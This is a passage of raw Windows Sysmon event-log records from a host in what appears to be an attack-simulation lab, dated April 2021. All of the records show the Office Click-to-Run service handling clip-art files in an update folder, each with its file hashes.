23542300x800000000000000066247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00523_.WMFMD5=918998308168D0A57E84978B7CB0769D,SHA256=24995EEE625E6396C664390A371CE3FF1459FE35EC26A6224E2A733A994E3CD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00512_.WMFMD5=CEF3DEAF952004D462C9ADB2330D0F1A,SHA256=BC7EA6BEBCC1997EEC55A8EC6D090AB376AC6CF9130B86ED08B4A1F272B9CE1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00494_.WMFMD5=83357041B362F7546A1993A65705D749,SHA256=993288CA5205A8CEFA09C29BA53A1DB264FBB3F28F63FF488B852664550F0C3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00487_.WMFMD5=4B5BF46278C6FC586AFB6AF8833E3C0C,SHA256=DCBA319E9228668381D29C4EE023B090034257B1E96004902CDB19EC5271C0D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00462_.WMFMD5=525F3CAB08977250A5583F5ECB28A728,SHA256=C15CDAC03CF67E96B81AF79CD11397A8CEDD50CDB5329540849BE80765CE14B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00458_.WMFMD5=F8673C29C99ADBB88BEDD86BBAB149AA,SHA256=A3755878F7E959497A7236F3DF049E5F471602B9AB0E4EF1D1D4FF3E985EABE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00454_.WMFMD5=4C42F0BAC4E0DAA4153964E53FA11554,SHA256=A1E823A8BAEC2188D317AF2D0328CAB4D4D915E73205DAF0797274879B7B894D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00452_.WMFMD5=9456E62F7C75B8DAFE66D71D15E65FB3,SHA256=758F37BE264C5A9CDA87BAE13B12277ED9283EAB900184D3D2A8C3F2E339F352,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00438_.WMFMD5=32C686D67516962280D3F7C34ACEF039,SHA256=7AD1E77E5685BF2A2E99D0D7A16A8A1D48740376F5FA65C0B3035A58EB7B2C8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00433_.WMFMD5=C13EF177361F65F45F32FB92CE0AEDEA,SHA256=1F77463EB76301F0FBBC0A9E065AFA89CFFED44B49D13A5C6C2D9E9F7BB5AFF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00417_.WMFMD5=CD0D6E66ACA7458AFE9E62388014A6B5,SHA256=7B5ADD20F48480B45C8B8DF96E58C4CB9AFB7421E5B1EE7C6660B28E66F3A35B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00396_.WMFMD5=D186D7BE56850E235A7DA0D430BE1A4B,SHA256=5973633C0865E46908D494C910B6DDA9D5F5AF9A7A0B2CA225930C6B0E429AE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00395_.WMFMD5=A9D0A1B4073E06EE54B50BFC88569D03,SHA256=22CCFAFBD50D52A7B0E76919125D067F4CC785B7C8CFCEF394DF162FECA99844,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00394_.WMFMD5=6951A11691097AAB4329C043457E41AD,SHA256=BF69D59E982993C8AB86B8F164DA7757A44BF53BE2160EB0C1234B9A166EE7FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00391_.WMFMD5=9042719F4818B7F0D4D1A4BD7010E8DA,SHA256=FDD3C4E8B157243EB2D2F24E5ED05D861502C1763B197DE299A010BBC9999B64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00390_.WMFMD5=5EEC488D5C92FCC43C3F054100E0E572,SHA256=7D33B80291F9B32DF9086DEE8B52CDDA266B4EBA51B60FB4BD82BA17883CFAF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00389_.WMFMD5=ED0D4BE5019A0C2E7B5C77DC273B6BA3,SHA256=D0E7C0F4BDB2C8F992AB12F6501047F68B21C2E6A8DE6AF3C88F4721FFEF31AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00388_.WMFMD5=2054246E2747325DA8B066F4876DD512,SHA256=BD6694113F15BE8B9869A5B060B9A127B3453CE74EC2B8EED33CD210EAD2748F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00330_.WMFMD5=CFD6A4AE8DED61F6F343F89BB1DCE88C,SHA256=4BBC1AC972715AE041462688043B995A74B348622F2233BD5E6979C56EAAAC1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00238_.WMFMD5=B59220AD0B62AA9FABF010BEE13AEC5D,SHA256=08334D454647F88179FFFCC567531AFA26799C0FCC02A1ED06D3F1AF1BAC4B92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00068_.WMFMD5=4C46D755562C65CA150E3379FD4717BA,SHA256=1C379F4A08851A76FD3A6443C2ACB08427F9D9C280C6E19B6AB4C862AA13BC9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00058_.WMFMD5=BD74F39AEE032EB96C64DD8DE6D1846F,SHA256=62BD8AD92E951C86DBA5FD0903A9FDDB75989DEDC2A8646E42BE12EE9088F204,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00057_.WMFMD5=814E1F23984309D6AF94B337D6F2536C,SHA256=A87D40C953A5768F745F84D8B8FCA4CF7D244CC63AB2E7B2FAC937568000848E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00042_.WMFMD5=F6FD0689E9DF9CA741D99BCE4BB5EEFB,SHA256=27EB913FE778F103581A206A71D4DB68AC29588AEF9ECA13C2F729559ED0010C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\MUSIC_01.MIDMD5=91E8EBC788131390A8D57ABBB467EE6E,SHA256=30FF883F1410766DD48CBDDCE7F13CED6028C4BE6D898DAE16ED189281EA5DED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\MP00646_.WMFMD5=8BBA046C52CD32D5A83E95A7FCDEF158,SHA256=FE8CCC587040DCA75D6ED5B3BD5DC9AF80ED5911B05852933544BACA067D1369,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\MP00132_.WMFMD5=05911DF93219B39F686E23C2F03A8919,SHA256=12CAF17560183AF3AACB13FFE5A0CB1E407F461034B30B438DF42B6D88543042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\MP00021_.WMFMD5=99D28525AA398FC8C75C90DFC2ABC903,SHA256=80111F06497905C69FF74F7872E25B842C5F5B63540B3E412C9E97E11FDB727E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\JNGLE_01.MIDMD5=25E7AA3C9E6BCEDD896741261CF04477,SHA256=A31D64F4778F85D07BF5C755BE5DF787FA204E81A6DE6AA075E1D32F3D5A3F3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\JAVA_01.MIDMD5=1972574D57B331DF75E3039F22754284,SHA256=29468592DE2C5A528DA8F12516070354CDC0F1CF130AEBDE570C91D1284265C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0400005.PNGMD5=806CF11F8C1CFAFBA6B8457CC2B4DAC9,SHA256=183954A1CDBB6B99818444383B0772DE397F38A7D7B52BAD2F8442964BED7DCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0400004.PNGMD5=DE33EC486165E12EC0BB58795EF3C4DD,SHA256=F3633A35A9FD4687CE9A245B6E883E7EAD2C8B8B9E3E2ED2D3D461561CBD008F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0400003.PNGMD5=C8FCF48C9DCB57B30C4B1ADCA9C05972,SHA256=E931D7168A56BE1A9946A8D77B9713A070A9F63077E385B14741EDF60B9F04F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0400002.PNGMD5=1D65C8AD3EA2F96491B849C4D47F953E,SHA256=DF55E5BB8E7EA734FF8962AC958033D81AD627E062BBEB67F3220AA80C158271,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0400001.PNGMD5=6C52CEBD4D062A0BE128B0EF78B40D92,SHA256=8032018B3594E534729320FD2EFC7F057645FA0328EC4905166BAF073719BB90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0390072.JPGMD5=8F89B56E056B8915E8811083070E18D7,SHA256=63F9D6E419B6EC5DEA13BAE8A2AE7C7BB0B10D26FE2A936FFC04D54B3D6CF359,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0387895.JPGMD5=200DD8E95CABF409A803076FB6206F21,SHA256=651EA308C5ABF8818AFAA33A394AEECF37DAFA9B611CDCE51B620281E6F687E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0387882.JPGMD5=BE266FDB13F2A83878D3CFEC997614A3,SHA256=EFAA9A89233F2002EFE5967BDA056E5BA1003417631794152B2FC45BB51E7587,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0387604.JPGMD5=FB71989A1151394569CCAFDF3C80B57C,SHA256=42B3CFD0B3B81159C3384F4A68D1CB0E8E9A163CB4EA975FC7B0E57F02FDBD3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0387591.JPGMD5=A76B697A12F65688671F68F86D83D8C9,SHA256=45AAA3C23116CAC353BDA7EACE12961901C5D80A44A8C438E0D0916E0BA39B0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0387578.JPGMD5=C38A568A00574704DF606C7426365AC5,SHA256=9CF882B0E852802096DF7998102C55909ECA7B9E64A0E5ED80E0300AF26FA6B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0387337.JPGMD5=3A653C7E43903865F99C13CFD861ACB6,SHA256=25FACF5EDFF6B5FDA0B35518B35D3AE39C2C0C77D8A0204750190C9F5B246377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0386764.JPGMD5=E119BF6336D66754487F04EE9B906C31,SHA256=81D12DD9585620B06DFFAFB79A4C07FDBCACAF8AA777031F981DC0AED5141588,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0386485.JPGMD5=933B3516C05C8BEE9E9820FC999602EE,SHA256=F99B055277D6C1E84BE48C82CAA2301071F2B381F35DBF8019699DD0D6D7CE4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 